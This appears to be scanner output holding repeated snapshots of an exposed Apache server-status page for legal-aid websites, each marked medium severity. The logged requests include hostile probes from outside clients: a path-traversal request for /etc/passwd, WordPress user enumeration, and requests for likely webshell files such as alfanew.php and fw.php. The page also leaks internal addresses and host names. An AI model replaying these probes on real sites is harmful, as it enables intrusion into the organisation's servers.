::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-586324260/5/415031_ 0.4651062680.00.136596.51 130.176.208.182http/1.1atlantalegalaid.org:8080POST /api/gql HTTP/1.1 13-586324310/14/328828_ 2.0350821490.00.604791.04 130.176.208.182http/1.1atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 14-586-0/0/289514. 0.002341000.00.004307.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-585-0/0/265275. 4.569444600.00.003780.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-585-0/0/230473. 0.7710257300.00.003442.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-580-0/0/167742. 17.7848126500.00.002340.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-579-0/0/145444. 0.0057813700.00.002064.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-579-0/0/137616. 2.2757814800.00.002104.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-579-0/0/128299. 3.4257143200.00.001823.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-579-0/0/116746. 0.8757814600.00.001693.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-579-0/0/121137. 0.0057814000.00.001644.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-579-0/0/106118. 0.965615952630.00.001535.83 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 24-579-0/0/108741. 0.0057813900.00.001366.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-579-0/0/86001. 0.0060651900.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-579-0/0/68645. 0.0060651700.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-579-0/0/65061. 0.0060651500.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00284849700.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00284849500.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00284849600.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00284849400.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82930017700.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00937157400.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15926969500.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0692879946620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23928799400.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00937160900.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00937160700.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32928799410080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00937160800.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00937160600.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00937160500.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00937160400.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00937160300.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00937160200.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001396394100.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001396394000.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001396393900.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001396393800.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001396393700.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001396393600.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001396393500.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001396393400.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001396393300.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001396393200.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HT
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed763ceda3
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 14-Nov-2025 15:39:31 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 585 Parent Server MPM Generation: 584 Server uptime: 583 days 22 hours 44 minutes 57 seconds Server load: 0.00 0.00 0.00 Total accesses: 13760916 - Total Traffic: 195.7 GB CPU Usage: u287.25 s24.77 cu0 cs0 - .000618% CPU load .273 requests/sec - 4165 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers _______.__W..................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-584155920/10/812756_ 2.356191570.00.1413477.42 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 1-584154590/47/789644_ 1.023610.00.3513081.63 130.176.208.182http/1.1legalaidconnections.org:8080GET / HTTP/1.1 2-584154440/13/758050_ 1.3112782680.00.5512944.65 3.172.65.147http/1.1atlantalegalaid.org:8080GET /simple.php HTTP/1.1 3-584154430/48/740150_ 1.8012832520.00.4812413.54 3.172.65.133http/1.1atlantalegalaid.org:8080GET /alfanew.php HTTP/1.1 4-584165720/50/720451_ 2.3012811540.00.7011889.12 3.172.65.165http/1.1atlantalegalaid.org:8080GET /wp-login.php HTTP/1.1 5-584184060/6/699697_ 1.2912802780.00.3911563.54 13.124.199.101http/1.1atlantalegalaid.org:8080GET /wp-content/plugins/google-seo-rank/module.php HTTP/1.1 6-584154490/12/660615_ 1.1412822820.00.4310901.13 3.172.65.171http/1.1atlantalegalaid.org:8080GET /fw.php HTTP/1.1 7-584-0/0/635724. 0.45127600.00.0010400.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-584154540/47/603569_ 1.41127700.00.499810.29 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 9-584184160/6/583669_ 1.0735700.00.339220.94 167.71.220.39http/1.1atlantalegalaid.org:8080CONNECT google.com:443 HTTP/1.1 10-5841842324/26/514353W 0.460028.40.168751.94 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 11-583-0/0/478724. 0.005006100.00.007901.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-583-0/0/414991. 0.006026300.00.006594.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-583-0/0/328807. 0.006025900.00.004790.17 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-583-0/0/289499. 0.433326800.00.004306.87 45.79.149.214http/1.1atlantalegalaid.org:8080\x16\x03\x01\x02 15-579-0/0/265251. 5.7938870400.00.003779.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-579-0/0/230468. 0.0039541700.00.003442.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-580-0/0/167742. 17.7829853900.00.002340.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-579-0/0/145444. 0.0039541100.00.002064.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-579-0/0/137616. 2.2739542200.00.002104.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-579-0/0/128299. 3.4238870600.00.001823.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-579-0/0/116746. 0.8739542000.00.001693.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-579-0/0/121137. 0.0039541400.00.001644.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-579-0/0/106118. 0.963788692630.00.001535.83 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 24-579-0/0/108741. 0.0039541300.00.001366.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-579-0/0/86001. 0.0042379300.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-579-0/0/68645. 0.0042379100.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-579-0/0/65061. 0.0042378900.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00266577100.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00266576900.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00266577000.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00266576800.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82911745000.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00918884800.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15908696900.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0691052686620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23910526800.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00918888300.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00918888100.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32910526810080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00918888200.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00918888000.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00918887900.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00918887800.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00918887700.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00918887600.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001378121500.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001378121400.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001378121300.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001378121200.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001378121100.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001378121000.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001378120900.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001378120800.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001378120700.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001378120600.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-42
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed6314a772
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Wednesday, 12-Nov-2025 15:03:32 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 583 Parent Server MPM Generation: 582 Server uptime: 581 days 22 hours 8 minutes 59 seconds Server load: 0.00 0.00 0.00 Total accesses: 13759476 - Total Traffic: 195.7 GB CPU Usage: u333.49 s28.41 cu0 cs0 - .00072% CPU load .274 requests/sec - 4179 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers _W___._____..................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-5823860/55/812572_ 3.328372000.01.1013468.76 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1762958968.089122056961059 1-58239425/110/789441W 8.800030.02.7113076.27 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 2-5823460/44/757954_ 7.321036340.02.1212940.84 130.176.137.70http/1.1elearning.alas.org:8080GET /login/forgot_password.php HTTP/1.1 3-5823450/85/740005_ 9.5327600.02.4512408.18 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 4-5823990/31/720320_ 6.03394014220.01.6611884.89 70.132.1.135http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 5-582-0/0/699618. 3.201619000.00.0011561.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-5823510/24/660504_ 3.5211590.00.9510898.16 3.172.70.194http/1.1elearning.alas.org:8080GET /pluginfile.php/168/course/overviewfiles/Moodle%20images%20 7-58222340/49/635589_ 3.493913380.01.0310397.38 70.132.1.135http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 8-5823640/25/603434_ 4.11168700.01.459806.79 89.42.231.77http/1.1atlantalegalaid.org:8080GET /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 9-58222390/11/583567_ 1.933130470.00.609217.88 3.172.35.142http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-58222440/20/514284_ 3.458375020.00.998749.69 130.176.187.246http/1.1atlantalegalaid.org:8080GET /favicon.ico HTTP/1.1 11-581-0/0/478718. 3.793111000.00.007901.30 20.65.194.38http/1.1 12-581-0/0/414988. 2.79311101710.00.006594.58 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1762924759.156477928161621 13-581-0/0/328777. 0.519389600.00.004789.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-579-0/0/289488. 3.122039112500.00.004306.74 70.132.4.80http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 15-579-0/0/265251. 5.7921374600.00.003779.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-579-0/0/230468. 0.0022045900.00.003442.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-580-0/0/167742. 17.7812358100.00.002340.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-579-0/0/145444. 0.0022045300.00.002064.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-579-0/0/137616. 2.2722046400.00.002104.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-579-0/0/128299. 3.4221374800.00.001823.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-579-0/0/116746. 0.8722046200.00.001693.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-579-0/0/121137. 0.0022045600.00.001644.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-579-0/0/106118. 0.962039112630.00.001535.83 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 24-579-0/0/108741. 0.0022045500.00.001366.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-579-0/0/86001. 0.0024883400.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-579-0/0/68645. 0.0024883200.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-579-0/0/65061. 0.0024883000.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00249081300.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00249081100.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00249081200.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00249081000.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82894249200.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00901389000.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15891201100.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0689303106620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23893031000.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00901392500.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00901392300.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32893031010080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00901392400.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00901392200.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00901392100.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00901392000.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00901391900.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00901391800.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001360625700.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001360625600.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001360625500.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001360625400.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001360625300.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001360625200.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001360625100.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001360625000.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001360624900.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001360624800.00.00286.72
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed71b2b1bd
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 10-Nov-2025 14:38:17 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 581 Parent Server MPM Generation: 580 Server uptime: 579 days 21 hours 43 minutes 44 seconds Server load: 0.00 0.00 0.00 Total accesses: 13757477 - Total Traffic: 195.6 GB CPU Usage: u306.03 s25.73 cu0 cs0 - .000662% CPU load .275 requests/sec - 4192 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ____..____._.....W.............................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-580185470/56/812361_ 9.7117022560.02.8213460.58 23.180.120.243http/1.1 1-580184080/21/789228_ 2.6217022560.00.7913067.04 23.180.120.243http/1.1 2-580186830/94/757761_ 10.1814464310.03.1912932.28 130.176.187.246http/1.1atlantalegalaid.org:8080GET /favicon.ico HTTP/1.1 3-580183970/37/739733_ 4.1814461630.01.5212399.17 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1762784043.376209020614624 4-580-0/0/720233. 3.95721700.00.0011880.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-580-0/0/699555. 0.71721800.00.0011559.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-580190050/54/660353_ 1.76170200.00.5410892.58 23.180.120.243http/1.1 7-580201350/10/635343_ 0.28170200.00.0110390.33 23.180.120.243http/1.1 8-580201400/18/603327_ 1.62170200.00.409801.51 23.180.120.243http/1.1 9-580201450/14/583370_ 0.36170200.00.079210.80 23.180.120.243http/1.1 10-579-0/0/514240. 0.004615000.00.008747.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-580184130/46/478584_ 6.27170200.01.917898.20 23.180.120.243http/1.1 12-579-0/0/414971. 0.004614900.00.006593.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-579-0/0/328774. 3.213943000.00.004788.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-579-0/0/289488. 3.12295952500.00.004306.74 70.132.4.80http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 15-579-0/0/265251. 5.793943100.00.003779.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-579-0/0/230468. 0.004614300.00.003442.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-5801839825/60/167681W 4.580029.61.292338.13 130.176.208.143http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 18-579-0/0/145444. 0.004613700.00.002064.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-579-0/0/137616. 2.274614800.00.002104.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-579-0/0/128299. 3.423943300.00.001823.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-579-0/0/116746. 0.874614600.00.001693.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-579-0/0/121137. 0.004614000.00.001644.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-579-0/0/106118. 0.96295952630.00.001535.83 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 24-579-0/0/108741. 0.004613900.00.001366.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-579-0/0/86001. 0.007451900.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-579-0/0/68645. 0.007451700.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-579-0/0/65061. 0.007451500.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00231649800.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00231649600.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00231649700.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00231649500.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82876817700.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00883957500.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15873769500.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0687559956620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23875599500.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00883961000.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00883960800.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32875599510080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00883960900.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00883960700.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00883960600.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00883960500.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00883960400.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00883960300.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001343194200.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001343194100.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001343194000.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001343193900.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001343193800.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001343193700.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001343193600.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001343193500.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001343193400.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 